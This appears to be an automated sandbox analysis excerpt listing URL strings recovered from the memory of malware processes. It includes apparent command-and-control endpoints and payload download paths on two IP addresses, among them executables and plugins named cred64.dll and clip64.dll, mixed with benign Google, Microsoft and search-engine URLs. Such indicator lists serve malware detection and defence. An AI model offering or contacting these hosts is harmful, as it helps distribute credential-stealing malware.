Source: explorha.exe, 00000006.00000002.2899294419.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.000000000075D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe8
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exeP
Source: explorha.exe, 00000006.00000002.2899294419.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exeata
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/en-US
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/Plugins/clip64.dll
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/Plugins/cred64.dll
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2668917227.000001DDF136D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php)
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php/
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php0
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php342a2
Source: rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php6)
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php;
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpB
Source: chrosha.exe, 00000010.00000002.2907399446.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpG
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpP
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpY
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phperWgfTOmIUKDbvTuTS4b2SL=ex.php
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpp
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpq
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpv
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeF
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeI
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/xeJ
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/&
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e17e76#da#
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa550018
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/33.132.56/015f815db2cd0aea5fb37b3eefba1586aa001
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/33.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e17e76n
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/4e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada
Source: explorha.exe, 00000006.00000002.2899294419.000000000071B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD71EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.000000000063A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php01
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php51a4f
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php56001
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php8
Source: rundll32.exe, 0000000B.00000002.2900366826.000000000063A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD71EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7214000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1b
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1es
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpUsers
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phph
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpoded
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpru
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpv
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpx
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/a
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e171
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e001
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e76#
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/f49fa1f45b59ea9f5e7af18214e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada#
Source: svchost.exe, 00000012.00000002.2922554035.0000019ECF261000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF44D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E248B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2625392452.000001CA65298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E23118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E22EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E23118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001D.00000002.2646021051.000001CA6D510000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.?
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpuTpu
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.goo
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E22EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56173000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56849000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E2451E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56849000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF51A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2427444325.0000019ECF4E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.2501270876.0000017E3B66C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.
Source: powershell.exe, 0000001D.00000002.2644719324.000001CA6D3B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.c
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/R-
